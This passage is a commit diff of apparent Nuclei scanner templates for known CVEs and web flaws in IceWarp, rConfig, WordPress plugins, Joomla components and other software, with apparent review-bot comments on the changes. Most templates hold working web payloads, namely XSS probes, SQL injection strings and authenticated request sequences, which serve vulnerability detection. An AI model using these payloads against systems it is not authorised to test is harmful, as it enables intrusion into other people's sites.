fixed errors

patch-1
Prince Chaddha 2023-10-17 13:46:05 +05:30
parent 1b2fddb9cb
commit c1b18b3f06
47 changed files with 148 additions and 177 deletions

View File

@ -1,36 +0,0 @@
id: CVE-2023-37728
info:
name: Icewarp Icearp v10.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
reference:
- https://medium.com/@ayush.engr29/cve-2023-37728-6dfb7586311
- https://nvd.nist.gov/vuln/detail/CVE-2023-37728
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
shodan-query: http.favicon.hash:2144485375
tags: cve,cve2023,icearp,icewarp,xss
http:
- method: GET
path:
- "{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
- "{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")'
- 'contains(body, "<img src onerror=alert(document.domain)>")'
condition: and
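Review bot: this removes the whole template rather than editing it; because a second template with the same `id: CVE-2023-37728` is modified later in this commit, dropping this copy avoids a duplicate template ID, which is the right call. Confirm that nothing unique to this copy is lost in the process: the `shodan-query: http.favicon.hash:2144485375` line, the `stop-at-first-match: true` option and the second `{{BaseURL}}/?color=` path should all end up in the surviving file.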

View File

@ -2,26 +2,36 @@ id: CVE-2020-10220
info:
name: rConfig 3.9 - SQL Injection
author: theamanrawat
author: ritikchaddha,theamanrawat
severity: critical
description: |
An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
remediation: |
Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://www.exploit-db.com/exploits/48208
- http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-10220
- http://packetstormsecurity.com/files/156688/rConfig-3.9-SQL-Injection.html
- http://packetstormsecurity.com/files/156766/Rconfig-3.x-Chained-Remote-Code-Execution.html
- https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-10220
cwe-id: CWE-89
epss-score: 0.02204
epss-percentile: 0.88193
cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
metadata:
verified: true
shodan-query: http.title:"rConfig"
tags: cve,cve2020,rconfig,sqli
max-request: 1
vendor: rconfig
product: rconfig
shodan-query: title:"rConfig"
tags: packetstorm,cve,cve2020,rconfig,sqli
variables:
num: 999999999
num: "999999999"
http:
- method: GET
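Review bot: the first reference, https://www.rconfig.com/downloads/rconfig-3.9.4.zip, is the download archive of the affected release rather than an advisory or a fix; replace it with the vendor advisory or drop it. The new `remediation` line should also name a concrete fixed version instead of "a patched version", since the description already pins the affected range at "through 3.9.4". Quoting the variable as `num: "999999999"` is harmless if the value is only interpolated into the request as text; if it is ever compared numerically, leave it unquoted.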

View File

@ -1,7 +1,7 @@
id: CVE-2020-8615
info:
name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
author: r3Y3r53
severity: medium
description: |
@ -36,14 +36,14 @@ http:
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor
cookie-reuse: true
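Review bot: the body of the second request carries the `action` parameter twice, `action=add_new_instructor` at the start and `action=tutor_add_instructor` at the end. PHP keeps the last occurrence, so only `tutor_add_instructor` reaches the handler; if both are intended for some reason, a comment should say so, otherwise remove the first to make the request unambiguous. The indentation fix itself is fine.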

View File

@ -32,7 +32,7 @@ http:
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options.php HTTP/1.1
GET /wp-admin/options.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true

View File

@ -17,8 +17,8 @@ info:
cwe-id: CWE-89
metadata:
verified: true
google-query: inurl: "/plugins/header-footer-code-manager/"
max-request: 1
google-query: inurl:"/wp-content/plugins/wp-custom-pages/"
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager
http:
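Review bot: the new `google-query` points at `/wp-content/plugins/wp-custom-pages/`, but the template's tags name `header-footer-code-manager`; one of the two is wrong, and a dork for a different plugin will fingerprint the wrong sites. Check which plugin this template covers and align the query with it. If the old value was correct, it only needed the stray space removed: `inurl:"/plugins/header-footer-code-manager/"`.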

View File

@ -42,4 +42,4 @@ http:
- 'contains(header_2, "text/html")'
- 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")'
- 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")'
condition: and
condition: and

View File

@ -1,38 +1,52 @@
id: CVE-2021-25016
info:
name: Chaty Free < 2.8.3 & Pro < 2.8.2 - Cross-Site Scripting
author: r3Y3r53
name: Chaty < 2.8.2 - Cross-Site Scripting
author: luisfelipe146
severity: medium
description: |
The plugins do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting
The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
remediation: Fixed in 2.8.3
reference:
- https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
- https://nvd.nist.gov/vuln/detail/CVE-2021-25016
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
classification:
cve-id: CVE-2021-25016
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
tags: cve,cve2023,wpscan,wordpress,authenticated,wp-plugin,xss,chaty
publicwww-query: "/wp-content/plugins/chaty/"
tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty
http:
- raw:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1
GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
redirects: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<script>alert(document.domain)</script>")'
- 'contains(body_2, "Chaty")'
condition: and
- type: word
part: body
words:
- "search=</script><img src onerror=alert(document.domain)>"
- "chaty_page_chaty"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
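Review bot: the new name `Chaty < 2.8.2 - Cross-Site Scripting` drops the affected-range information the description still carries (Free before 2.8.3, Pro before 2.8.2) and contradicts `remediation: Fixed in 2.8.3`; a reader would take 2.8.2 of the free plugin as safe. Keep both ranges in the name, as the previous `Chaty Free < 2.8.3 & Pro < 2.8.2` did. Replacing `author: r3Y3r53` with `author: luisfelipe146` is also inconsistent with the rest of this commit, which appends co-authors (e.g. `ctflearner,r3Y3r53`). The tag correction from `cve2023` to `cve2021` is right.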

View File

@ -6,7 +6,7 @@ info:
description: |
The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page
remediation: Fixed in version 1.1.7
reference:
reference:
- https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63
- https://nvd.nist.gov/vuln/detail/CVE-2021-25079
- https://wordpress.org/plugins/contact-form-entries/
@ -27,7 +27,7 @@ http:
- |
GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl

View File

@ -6,7 +6,7 @@ info:
severity: critical
description: |
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_type parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
reference:
- https://wordpress.org/plugins/wp-statistics/
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042

View File

@ -1,4 +1,4 @@
id: CVE-2022-0814
id: CVE-2022-0814
info:
name: Ubigeo de Peru < 3.6.4 - SQL Injection
@ -6,7 +6,7 @@ info:
severity: critical
description: |
The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.
reference:
reference:
- https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814
- https://wordpress.org/plugins/ubigeo-peru/

View File

@ -6,7 +6,7 @@ info:
severity: critical
description: |
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
reference:
- https://wordpress.org/plugins/wp-statistics/
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042

View File

@ -3,17 +3,17 @@ id: CVE-2022-2535
info:
name: SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure
author: r3Y3r53
severity: Medium
severity: medium
description: |
The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink
remediation: Fixed in version 1.6.2
reference:
- https://wpscan.com/vulnerability/0e13c375-044c-4c2e-ab8e-48cb89d90d02
- https://nvd.nist.gov/vuln/detail/CVE-2022-2535
- https://nvd.nist.gov/vuln/detail/CVE-2022-2535
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2535
cve-id: CVE-2022-2535
cwe-id: CWE-639
metadata:
max-request: 1
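Review bot: the `severity: Medium` to `medium` change is correct (the schema expects lowercase), but the description in the context line still reads "users making. alive search", which should be "users making a live search"; fix it in the same pass, and add a period at the end of that sentence.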

View File

@ -1,7 +1,7 @@
id: CVE-2022-3242
info:
name: Microweber <1.3.2 - Cross-Site Scripting
name: Microweber <1.3.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
@ -13,7 +13,7 @@ info:
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cwe-id: CWE-79
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@ -30,5 +30,5 @@ http:
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>") && contains(tolower(body), "microweber")'
condition: and
- 'contains(body, "<script>alert(document.domain)</script>") && contains(tolower(body), "microweber")'
condition: and

View File

@ -17,7 +17,7 @@ info:
cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:*
metadata:
verified: true
tags: cve,cve2022,i3geo,xss
tags: cve,cve2022,i3geo,xss
http:
- method: GET

View File

@ -17,7 +17,7 @@ info:
cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:*
metadata:
verified: true
tags: cve,cve2022,i3geo,xss
tags: cve,cve2022,i3geo,xss
http:
- method: GET

View File

@ -5,7 +5,7 @@ info:
author: r3Y3r53
severity: medium
description: |
Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php.
Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-40047
- https://github.com/flatpressblog/flatpress/issues/153
@ -16,33 +16,33 @@ info:
tags: cve,cve2022,flatpress,authenticated,xss
variables:
randstring: "{{to_lower(rand_base(16))}}"
randstring: "{{to_lower(rand_base(16))}}"
http:
- raw:
- raw:
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}
------WebKitFormBoundary{{randstring}}
Content-Disposition: form-data; name="user"
{{username}}
------WebKitFormBoundary{{randstring}}
Content-Disposition: form-data; name="pass"
{{password}}
------WebKitFormBoundary{{randstring}}
Content-Disposition: form-data; name="submit"
Login
------WebKitFormBoundary{{randstring}}--
- |
GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl

View File

@ -10,7 +10,7 @@ info:
reference:
- https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4
- https://nvd.nist.gov/vuln/detail/CVE-2023-0600
classification:
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0600

View File

@ -17,18 +17,18 @@ info:
http:
- raw:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log=((username))&pwd={{password}}&wp-submit=Log+In
log=((username))&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=prettyurls HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin.php?page=prettyurls HTTP/1.1
Host: {{Hostname}}
@ -53,4 +53,4 @@ http:
part: body
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-z]+)" />'
- 'name="_wpnonce" value="([0-9a-z]+)" />'
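Review bot: the login body `log=((username))&pwd={{password}}&wp-submit=Log+In` wraps `username` in round brackets, so the placeholder is never substituted and the literal string `((username))` is sent as the login name; the two `admin.php?page=prettyurls` requests that follow will then run without a session and the `_wpnonce` extractor at the end will match nothing. Change it to `log={{username}}`, as the other WordPress templates in this commit do. The indentation changes are fine.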

View File

@ -7,7 +7,7 @@ info:
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
remediation: Fixed in version 7.13.52
reference:
reference:
- https://wpscan.com/vulnerability/fe9b7696-3b0e-42e2-9dbc-55167605f5c5
- https://nvd.nist.gov/vuln/detail/CVE-2023-2779
- https://wordpress.org/plugins/super-socializer/

View File

@ -15,7 +15,7 @@ info:
tags: cve,cve2023,wordpress,wp,wp-plugin,xss,newsletter,authenticated
http:
- raw:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}

View File

@ -6,14 +6,14 @@ info:
severity: medium
description: |
A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php
reference:
- https://www.exploit-db.com/exploits/51643
- https://nvd.nist.gov/vuln/detail/CVE-2023-36306
reference:
- https://www.exploit-db.com/exploits/51643
- https://nvd.nist.gov/vuln/detail/CVE-2023-36306
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-36306
cwe-id: CWE-79
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer
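Review bot: only indentation changes here, but the description in the context line has two problems worth fixing in the same pass: "Adiscon Aiscon LogAnalyzer" repeats the vendor name with a typo, and "execute arbitrary code via the asktheoracle.php" overstates a reflected XSS (CWE-79 per the classification below), which runs script in the victim's browser, not code on the server. The sentence is also cut off after "asktheoracle.php"; it should name the parameter and end with a period.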

View File

@ -1,51 +1,36 @@
id: CVE-2023-37728
info:
name: IceWarp Webmail Server - Cross-Site Scripting
author: technicaljunkie
name: Icewarp Icearp v10.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
IceWarp Webmail Server contains a cross-site scripting vulnerability in the /webmail/ color parameter.
Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
reference:
- https://medium.com/@ayush.engr29/cve-2023-37728-6dfb7586311
- https://nvd.nist.gov/vuln/detail/CVE-2023-37728
- https://medium.com/@ayush29/cve-2023-37728-6dfb7586311
- http://icearp.com
- http://icewarp.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-37728
cwe-id: CWE-79
epss-score: 0.00052
epss-percentile: 0.18493
cpe: cpe:2.3:a:icewarp:icewarp:10.2.1:*:*:*:*:*:*:*
metadata:
max-request: 2
verified: true
max-request: 1
vendor: icewarp
product: icewarp
shodan-query: title:"icewarp"
tags: cve,cve2023,xss,icewarp
shodan-query: http.favicon.hash:2144485375
tags: cve,cve2023,icearp,icewarp,xss
http:
- method: GET
path:
- '{{BaseURL}}/webmail/?color=%22%3E%3Cimg%20src%20onerror=%22alert(document.domain)%22%3E%3C%22%27'
- "{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
- "{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
matchers-condition: and
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- '><img src onerror="alert(document.domain)"><'
- 'IceWarp'
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")'
- 'contains(body, "<img src onerror=alert(document.domain)>")'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
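Review bot: the renamed template `Icewarp Icearp v10.2.1 - Cross Site Scripting` and the new `icearp` tag introduce a product name that does not exist; vendor and product are both IceWarp (see the `cpe:2.3:a:icewarp:icewarp:10.2.1` line and the `icewarp.com` reference), and the `icearp.com` reference being removed here was the same typo. Keep the previous `IceWarp Webmail Server` wording or use the product name the body matcher looks for, `IceWarp WebClient`, and drop the `icearp` tag. Two more things to check: the Medium reference changes its author handle from `@ayush29` to `@ayush.engr29`, and only one of those can resolve; and if `cve-id`, `epss-score`, `epss-percentile`, `cpe`, `vendor` and `product` are being removed rather than kept as context (the hunk shrinks from 51 to 36 lines), that is a regression against the version this replaces, so keep them.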

View File

@ -2,7 +2,7 @@ id: CVE-2023-38501
info:
name: CopyParty v1.8.6 - Cross Site Scripting
author: r3Y3r53
author: ctflearner,r3Y3r53
severity: medium
description: |
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
@ -14,7 +14,7 @@ info:
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
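Review bot: the co-author is appended consistently with the other files. While this block is open, the description needs a space in "Attack.Vulnerability" (or better, split it into two sentences) and the capitalisation "JavaScript".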

View File

@ -27,7 +27,7 @@ http:
- method: GET
path:
- "{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"
matchers:
- type: dsl
dsl:

View File

@ -5,7 +5,7 @@ info:
author: r3Y3r53
severity: high
description: |
The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.
The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php
- https://www.exploit-db.com/exploits/51684
@ -26,7 +26,7 @@ http:
txtUserId={{username}}&txtPassword={{password}}&btnLogin=Login
- |
GET /exciter.php HTTP/1.1
GET /exciter.php HTTP/1.1
Host: {{Hostname}}
attack: pitchfork

View File

@ -20,7 +20,7 @@ http:
POST /21408623/cgi-bin/tsaws.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<TSA_REQUEST_LIST PASSWORD="{{password}}"><TSA_REQUEST COMMAND="cmdWebCheckRole" ROLE="{{username}}"/></TSA_REQUEST_LIST>
attack: pitchfork

View File

@ -10,7 +10,6 @@ info:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5609.php
metadata:
verified: true
tags: redv,log,disclosure,exposure
http:
@ -24,4 +23,4 @@ http:
- 'status_code == 200'
- 'contains(content_type, "text/plain")'
- 'contains_all(body, "Log file", "[LogParser]", "[INFO]")'
condition: and
condition: and

View File

@ -1,7 +1,7 @@
id: joomla-com-booking-component
info:
name: Joomla! com_booking component 2.4.9 - Information Leak
name: Joomla! com_booking component 2.4.9 - Information Leak
author: r3Y3r53
severity: high
description: |
@ -19,12 +19,12 @@ http:
- raw:
- |
GET /index.php?option=com_booking&controller=customer&task=getUserData&id=123 HTTP/1.1
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'status_code == 200'
- 'contains(body, "name") && contains(body, "username") && contains(body, "email")'
- 'contains(content_type, "text/html")'
condition: and
condition: and

View File

@ -1,7 +1,7 @@
id: ep-web-cms-xss
info:
name: EP Web Solutions CMS - Cross Site Scripting
name: EP Web Solutions CMS - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |

View File

@ -1,7 +1,7 @@
id: erensoft-sqli
info:
name: ErenSoft - SQL Injection
name: ErenSoft - SQL Injection
author: r3Y3r53
severity: high
description: |

View File

@ -1,7 +1,7 @@
id: indonasia-toko-cms-sql
info:
name: Indonasia Toko CMS - SQL Injection
name: Indonasia Toko CMS - SQL Injection
author: r3Y3r53
severity: high
description: |
@ -20,7 +20,7 @@ http:
POST /kinerja-alumni/index.php?mnu=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user=%27+or+1%3D1+limit+1+--+-%2B&pass=%27+or+1%3D1+limit+1+--+-%2B&Login=Login
matchers-condition: and

View File

@ -25,6 +25,6 @@ http:
- type: dsl
dsl:
- 'contains_all(body, "confirm(document.domain)", "Joomla")'
- 'contains(content_type, "text/html")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and

View File

@ -19,11 +19,11 @@ http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs[x][search]=gx3vt%20onfocus=alert(document.domain)%20autofocus=%20itkrzsug7w5"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "onfocus=alert(document.domain) autofocus=", "catalog-results", "joomla")'
condition: and
- 'contains(content_type, "text/html")'
- 'contains_all(body, "onfocus=alert(document.domain) autofocus=", "catalog-results", "joomla")'
condition: and

View File

@ -1,12 +1,12 @@
id: khodrochi-cms-xss
info:
name: Khodrochi CMS - Cross-Site Scripting
name: Khodrochi CMS - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A cross site scripting vulnerability was found in the Khodrochi.ir CMS an Iranian Car Services Platform.
reference:
reference:
- https://www.exploitalert.com/view-details.html?id=38723
- https://cxsecurity.com/ascii/WLB-2022050087
metadata:
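Review bot: renaming `Cross-Site Scripting` to `Cross Site Scripting` moves this template away from the hyphenated form that CVE-2021-25016 and CVE-2022-3242 use in this same commit; pick one spelling for the repository (the hyphenated form matches the CWE-79 title) instead of changing individual files in opposite directions.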

View File

@ -9,7 +9,7 @@ info:
reference:
- https://www.exploitalert.com/view-details.html?id=36234
metadata:
max-request: 2
max-request: 2
google-dork: intext:"Developed by Phuket Solution"
verified: true
tags: phuket,sqli,phuket-cms
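Review bot: `google-dork:` is not the key the other templates in this commit use; the header-footer-code-manager and Megawp files use `google-query:`. Either this line or those should change so the metadata can be filtered consistently.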

View File

@ -9,7 +9,7 @@ info:
reference:
- https://vulners.com/packetstorm/PACKETSTORM:173002
- https://www.exploitalert.com/view-details.html?id=39611
- https://codecanyon.net/user/kreativdev/portfolio
- https://codecanyon.net/user/kreativdev/portfolio
metadata:
verified: true
max-request: 1
@ -19,11 +19,11 @@ http:
- method: GET
path:
- "{{BaseURL}}/shop/products?category=cordless-tools&min=1026553%3balert(document.domain)%2f%2f772"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'status_code == 200'
- 'contains(body, "rentequip") && contains(body, "1026553;alert(document.domain)//772")'
- 'contains(content_type, "text/html")'
condition: and

View File

@ -1,10 +1,10 @@
id: shoowbiz-xss
info:
name: SHOOWBIZ - Cross Site Scripting
name: SHOOWBIZ - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Cross-Site Scripting, is a type of security vulnerability commonly found in web applications. It occurs when an attacker injects malicious scripts (typically written in JavaScript) into web pages viewed by other users.
Cross-Site Scripting, is a type of security vulnerability commonly found in web applications. It occurs when an attacker injects malicious scripts (typically written in JavaScript) into web pages viewed by other users.
reference:
- https://www.exploitalert.com/view-details.html?id=36000
metadata:
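Review bot: the description is a generic definition of cross-site scripting and says nothing about SHOOWBIZ: which page or parameter reflects input, and in which version. An analyst triaging a hit needs the product-specific statement; the exploitalert reference (id 36000) presumably carries it, so summarise that instead of the textbook sentence.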

View File

@ -19,7 +19,7 @@ http:
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=%27%2Bjoxvy--%2Bz&password=ffesdf
redirects: true

View File

@ -17,7 +17,7 @@ info:
tags: sqli,unauth,stackposts
http:
- raw:
- raw:
- |
@timeout: 15s
POST /spre/auth/login HTTP/2

View File

@ -29,5 +29,5 @@ http:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<svg/onload=alert(document.domain)>")'
- 'contains(body, "PhotoBlocks")'
- 'contains(body, "PhotoBlocks")'
condition: and

View File

@ -6,7 +6,7 @@ info:
severity: medium
description: |
The 'page' GET parameter of the inc/protected-forms-table.php file was affected by a reflected XSS vulnerability.
reference:
reference:
- https://wpscan.com/vulnerability/c0a138d8-93ac-463c-b650-d849352c0b44
- https://packetstormsecurity.com/files/154393/
- https://wordpress.org/plugins/ellipsis-human-presence-technology/

View File

@ -7,8 +7,8 @@ info:
description: |
WordPress theme with a 'Mega-Theme' design is vulnerable to a reflected XSS attack through the '?s=' parameter.
reference:
- https://cxsecurity.com/issue/WLB-2021120027
- https://www.zhaket.com/web/megawp-wordpress-theme
- https://cxsecurity.com/issue/WLB-2021120027
- https://www.zhaket.com/web/megawp-wordpress-theme
metadata:
google-query: Megawp-Theme
verified: true

View File

@ -6,7 +6,7 @@ info:
severity: medium
description: |
The 'pDetails' GET parameter from the js/imageDetails.php was vulnerable to an unauthenticated reflected XSS attack.
reference:
reference:
- https://wpscan.com/vulnerability/c6a8757e-41ef-4c20-8c7d-97b57d56fe0e
- https://wordpress.org/plugins/portrait-archiv-shop/
- https://packetstormsecurity.com/files/154343/

View File

@ -11,7 +11,6 @@ info:
- https://wpscan.com/vulnerability/d3c10f69-87b6-43fd-bcbc-c2d35b683ff4
- https://packetstormsecurity.com/files/154403/
- https://wordpress.org/plugins/qwiz-online-quizzes-and-flashcards/
remediation: Fixed in version 3.37
metadata:
publicwww-query: "/wp-content/plugins/qwiz-online-quizzes-and-flashcards/"
verified: true
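Review bot: this hunk removes one line without a replacement (7 lines become 6), and the candidate that stands out in the visible block is `remediation: Fixed in version 3.37`. If that is the line being dropped, keep it: the fixed version is the most actionable fact in this template.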

View File

@ -28,7 +28,7 @@ http:
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "reality", "estate", "><img src=x onerror=(alert)(document.domain)")'
condition: and

View File

@ -6,11 +6,11 @@ info:
severity: high
description: |
WordPress Plugin WP Statistics 13.0.7 contains an unauthenticated Time based SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
